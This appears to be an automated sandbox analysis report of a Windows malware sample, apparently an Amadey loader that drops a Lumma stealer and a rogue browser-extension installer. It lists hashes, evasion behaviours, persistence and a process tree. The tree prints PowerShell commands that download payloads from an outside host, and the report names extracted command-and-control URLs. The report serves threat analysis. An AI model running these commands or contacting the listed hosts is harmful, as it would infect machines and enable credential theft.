Analysis
max time kernel: 143s
max time network: 129s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 18:50
Static task: static1
Behavioral task: behavioral1
Sample: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Resource: win10v2004-20240426-en
General
Target: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Size: 1.8MB
MD5: f6986f363dde0d5f374abd0a1dac252b
SHA1: 4665c53ed2ce6bd84572fc398967d11421e00bab
SHA256: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512: 733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
SSDEEP: 49152:Cl/8HKuLWFBWcz/WrNKnun+YrhLOvn7e:8gLWnWczeNZn1VOf7
Malware Config
Extracted: https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted: https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted: https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted: amadey
4.20
c767c0
http://5.42.96.7
install_dir: 7af68cdb52
install_file: axplons.exe
strings_key: e2ce58e78f631ed97d01fe7b70e85d5e
url_paths: /zamo7h/index.php
Extracted: lumma
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://employhabragaomlsp.shop/api
https://stalfbaclcalorieeis.shop/api
https://civilianurinedtsraov.shop/api
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Blocklisted process makes network request 4 IoCs
Processes:
flow | pid | Process
64 | 3000 | powershell.exe
69 | 3000 | powershell.exe
81 | 4548 | powershell.exe
84 | 4548 | powershell.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | axplons.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | Newoff.exe
Executes dropped EXE 10 IoCs
Processes:
pid | Process
3112 | axplons.exe
2896 | Newoff.exe
2040 | vpn-1002.exe
3680 | lumma1234.exe
3672 | i0.exe
5076 | i0.tmp
2260 | axplons.exe
1160 | Newoff.exe
4748 | axplons.exe
3028 | Newoff.exe
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | axplons.exe
Loads dropped DLL 1 IoCs
Processes:
pid | Process
2040 | vpn-1002.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
87 | checkip.amazonaws.com
88 | checkip.amazonaws.com
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | Process
File created | C:\Windows\system32\shlwapi_p.dll | i0.tmp
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
pid | Process
3740 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
3112 | axplons.exe
2260 | axplons.exe
4748 | axplons.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | Process | procid_target
PID 3680 set thread context of 1436 | 3680 | lumma1234.exe | 99
Drops file in Program Files directory 15 IoCs
Processes:
description | ioc | Process
File created | C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\Extensions\updates.xml | i0.tmp
File opened for modification | C:\Program Files\Online Security\unins000.dat | i0.tmp
File created | C:\Program Files\scoped_dir4984_1382533742\extension.zip | chrome.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml | i0.tmp
File created | C:\Program Files\Online Security\is-JCPNV.tmp | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\chrome.exe.manifest | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest | i0.tmp
File opened for modification | C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest | i0.tmp
File created | C:\Program Files\Google\Chrome\Application\Extensions\security.crx | i0.tmp
File created | C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll | i0.tmp
File created | C:\Program Files\Online Security\unins000.dat | i0.tmp
Drops file in Windows directory 1 IoCs
Processes:
description | ioc | Process
File created | C:\Windows\Tasks\axplons.job | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Processes:
pid | Process
3000 | powershell.exe
4548 | powershell.exe
4916 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Kills process with taskkill 2 IoCs
Processes:
pid | Process
4032 | taskkill.exe
2824 | taskkill.exe
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 77 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 88 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 91 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
pid | Process
3740 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
3740 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
3112 | axplons.exe
3112 | axplons.exe
4916 | powershell.exe
4916 | powershell.exe
4916 | powershell.exe
3000 | powershell.exe
3000 | powershell.exe
3000 | powershell.exe
4548 | powershell.exe
4548 | powershell.exe
4548 | powershell.exe
2260 | axplons.exe
2260 | axplons.exe
4748 | axplons.exe
4748 | axplons.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
description | pid | Process
Token: SeDebugPrivilege | 4916 | powershell.exe
Token: SeDebugPrivilege | 3000 | powershell.exe
Token: SeDebugPrivilege | 4548 | powershell.exe
Token: SeDebugPrivilege | 4032 | taskkill.exe
Token: SeDebugPrivilege | 2824 | taskkill.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | Process
5076 | i0.tmp
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
description | pid | Process | procid_target
PID 3740 wrote to memory of 3112 | 3740 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe | 85
PID 3740 wrote to memory of 3112 | 3740 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe | 85
PID 3740 wrote to memory of 3112 | 3740 | 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe | 85
PID 3112 wrote to memory of 2896 | 3112 | axplons.exe | 93
PID 3112 wrote to memory of 2896 | 3112 | axplons.exe | 93
PID 3112 wrote to memory of 2896 | 3112 | axplons.exe | 93
PID 2896 wrote to memory of 3768 | 2896 | Newoff.exe | 94
PID 2896 wrote to memory of 3768 | 2896 | Newoff.exe | 94
PID 2896 wrote to memory of 3768 | 2896 | Newoff.exe | 94
PID 2896 wrote to memory of 2040 | 2896 | Newoff.exe | 96
PID 2896 wrote to memory of 2040 | 2896 | Newoff.exe | 96
PID 2896 wrote to memory of 2040 | 2896 | Newoff.exe | 96
PID 3112 wrote to memory of 3680 | 3112 | axplons.exe | 97
PID 3112 wrote to memory of 3680 | 3112 | axplons.exe | 97
PID 3112 wrote to memory of 3680 | 3112 | axplons.exe | 97
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 3680 wrote to memory of 1436 | 3680 | lumma1234.exe | 99
PID 2040 wrote to memory of 2876 | 2040 | vpn-1002.exe | 100
PID 2040 wrote to memory of 2876 | 2040 | vpn-1002.exe | 100
PID 2040 wrote to memory of 2876 | 2040 | vpn-1002.exe | 100
PID 2876 wrote to memory of 4916 | 2876 | cmd.exe | 102
PID 2876 wrote to memory of 4916 | 2876 | cmd.exe | 102
PID 2876 wrote to memory of 4916 | 2876 | cmd.exe | 102
PID 2876 wrote to memory of 3000 | 2876 | cmd.exe | 104
PID 2876 wrote to memory of 3000 | 2876 | cmd.exe | 104
PID 2876 wrote to memory of 3000 | 2876 | cmd.exe | 104
PID 2876 wrote to memory of 3672 | 2876 | cmd.exe | 107
PID 2876 wrote to memory of 3672 | 2876 | cmd.exe | 107
PID 2876 wrote to memory of 3672 | 2876 | cmd.exe | 107
PID 2876 wrote to memory of 4548 | 2876 | cmd.exe | 108
PID 2876 wrote to memory of 4548 | 2876 | cmd.exe | 108
PID 2876 wrote to memory of 4548 | 2876 | cmd.exe | 108
PID 3672 wrote to memory of 5076 | 3672 | i0.exe | 109
PID 3672 wrote to memory of 5076 | 3672 | i0.exe | 109
PID 3672 wrote to memory of 5076 | 3672 | i0.exe | 109
PID 5076 wrote to memory of 1204 | 5076 | i0.tmp | 110
PID 5076 wrote to memory of 1204 | 5076 | i0.tmp | 110
PID 1204 wrote to memory of 4984 | 1204 | cmd.exe | 112
PID 1204 wrote to memory of 4984 | 1204 | cmd.exe | 112
PID 4984 wrote to memory of 4916 | 4984 | chrome.exe | 113
PID 4984 wrote to memory of 4916 | 4984 | chrome.exe | 113
PID 5076 wrote to memory of 3592 | 5076 | i0.tmp | 114
PID 5076 wrote to memory of 3592 | 5076 | i0.tmp | 114
PID 5076 wrote to memory of 3964 | 5076 | i0.tmp | 116
PID 5076 wrote to memory of 3964 | 5076 | i0.tmp | 116
PID 5076 wrote to memory of 4032 | 5076 | i0.tmp | 118
PID 5076 wrote to memory of 4032 | 5076 | i0.tmp | 118
PID 5076 wrote to memory of 2824 | 5076 | i0.tmp | 120
PID 5076 wrote to memory of 2824 | 5076 | i0.tmp | 120
Processes
[1] C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"
    PID: 3740
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      PID: 3112
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Checks computer location settings
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
        PID: 2896
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
          PID: 3768
          - Creates scheduled task(s)
      [4] C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"
          PID: 2040
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\abc.bat"
            PID: 2876
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
              PID: 4916
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
              PID: 3000
              - Blocklisted process makes network request
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\AppData\Local\Temp\i0.exe
              Command line: i0.exe /verysilent /sub=1000
              PID: 3672
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp" /SL5="$130042,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
                PID: 5076
                - Executes dropped EXE
                - Drops file in System32 directory
                - Drops file in Program Files directory
                - Suspicious use of FindShellTrayWindow
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\system32\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""
                  PID: 1204
                  - Suspicious use of WriteProcessMemory
                [9] C:\Program Files\Google\Chrome\Application\chrome.exe
                    Command line: "C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti
                    PID: 4984
                    - Drops file in Program Files directory
                    - Suspicious use of WriteProcessMemory
                  [10] C:\Program Files\Google\Chrome\Application\chrome.exe
                       Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffd3f3dab58,0x7ffd3f3dab68,0x7ffd3f3dab78
                       PID: 4916
              [8] C:\Windows\system32\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\xbweti.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""
                  PID: 3592
              [8] C:\Windows\system32\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\dhglhc > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""
                  PID: 3964
              [8] C:\Windows\SYSTEM32\taskkill.exe
                  Command line: "taskkill.exe" /f /im "msedge.exe"
                  PID: 4032
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\SYSTEM32\taskkill.exe
                  Command line: "taskkill.exe" /f /im "chrome.exe"
                  PID: 2824
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
              PID: 4548
              - Blocklisted process makes network request
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
        PID: 3680
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          PID: 1436
[1] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    PID: 2260
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
[1] C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    PID: 1160
    - Executes dropped EXE
[1] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    PID: 4748
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
[1] C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    PID: 3028
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 1KB
MD5: 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1: c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256: e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512: 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Filesize: 16KB
MD5: 58b91f03dfc4cf14af464d97ede94660
SHA1: ee65d8bbed1a2599db87825126549af9bb905e98
SHA256: 609b4f96bd072252827a12871f585426d219fb7e51430e339fcee44ef3e2f74f
SHA512: b942f447ffb08149711def4281e87f5a9234271a6e2b198802f1560cbea4385e72e593bbdabc4e984f2bf520b55a28be03250f3668a0f8b00229000cf44965c9

Filesize: 16KB
MD5: 3081bd6181939301db545828ec689f19
SHA1: 79c197e0c874f76999589e7f670cfbf4449140d3
SHA256: 40e70d07d34f7e65cf9d8035bd0e575fd526e4f7d8765bfdebbfcd5143b089a6
SHA512: bc784dbeb23c34f4aebf99f2654e8db7c53689f5c903830ed9aad5e905884a7f882c9b1ffafb5683180a096897db2e0c8be9a0b122929788227492006dbf4756

Filesize: 418KB
MD5: 0099a99f5ffb3c3ae78af0084136fab3
SHA1: 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256: 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512: 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Filesize: 518KB
MD5: c4ffab152141150528716daa608d5b92
SHA1: a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256: c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512: a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

Filesize: 49KB
MD5: ccb630a81a660920182d1c74b8db7519
SHA1: 7bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256: a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA512: 8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

Filesize: 1.8MB
MD5: f6986f363dde0d5f374abd0a1dac252b
SHA1: 4665c53ed2ce6bd84572fc398967d11421e00bab
SHA256: 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512: 733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 3.5MB
MD5: b80362872ea704846e892f16aab924c3
SHA1: 222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256: d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512: beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5

Filesize: 47KB
MD5: 52311257a997455c0a32e1679e0b614e
SHA1: 395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA256: 50a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA512: 19488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0

Filesize: 208B
MD5: 963fb7657217be957d7d4732d892e55c
SHA1: 593578a69d1044a896eb8ec2da856e94d359ef6b
SHA256: 1d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512: f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd

Filesize: 43KB
MD5: 11a38af0ad330d95d2fb709612a44fa5
SHA1: bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA256: 0d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA512: 4bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9

Filesize: 48KB
MD5: 4cac70c3fdb075424b58b220b4835c09
SHA1: 651e43187c41994fd8f58f11d8011c4064388c89
SHA256: 4094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512: 810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963

Filesize: 49KB
MD5: 931e9d91cc7969c1dcc0529135556b2f
SHA1: 55c8efcf98411783fc351957cefbd3228882e99d
SHA256: 0f9c5676c1f2db6aa3cbd378bef4719c7c86fce24200aa4d92ba6298291cf8a9
SHA512: 9d1a0680c2c7a14169d896b7ce267ef3f67db79d897df1df3f5b06ab42e3addd7b013a5f0c5285d6aa816fa3c2644dc64c0f72e442c74ac7f1e24ae500685a15

Filesize: 1KB
MD5: 261f4bbd673d2fabfcdc46bc6d3ed476
SHA1: ef4dcdf1d1a7b34ac6150eba577f359adec3cd38
SHA256: 5116e02d1641a0d9c6faed1161c81befb05d8bc0d99f7854b237b3cd4761a5ea
SHA512: 2d3550dee24cdf756a05083be3fec627089f7e5e4bc6ff9e304a82d03392a57f588fe5cd9cf2c51e6982e1ac199a1d61044b837db333ed01944f9e0b365affce

Filesize: 8KB
MD5: d57a101cf48bd00b5297596c081ece42
SHA1: 47be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256: a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA512: 7110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5

Filesize: 3KB
MD5: ca00972a17d51a3e6a28cfc8711474e4
SHA1: c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256: fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA512: 9731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516

Filesize: 108KB
MD5: 432c4c1300ba1c077fbd681f9667a104
SHA1: 33482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256: adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA512: 0ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad

Filesize: 438B
MD5: 1d47eb945d1299c0e53bcada476d32b3
SHA1: 509f9041f7e2a14402915feb4f2a739cfac5636b
SHA256: 0a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA512: 6d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258

Filesize: 3.1MB
MD5: bdf5432c7470916ab3c25f031c4c8d76
SHA1: 4762eeae811cfad7449a3d13fb1d759932c6d764
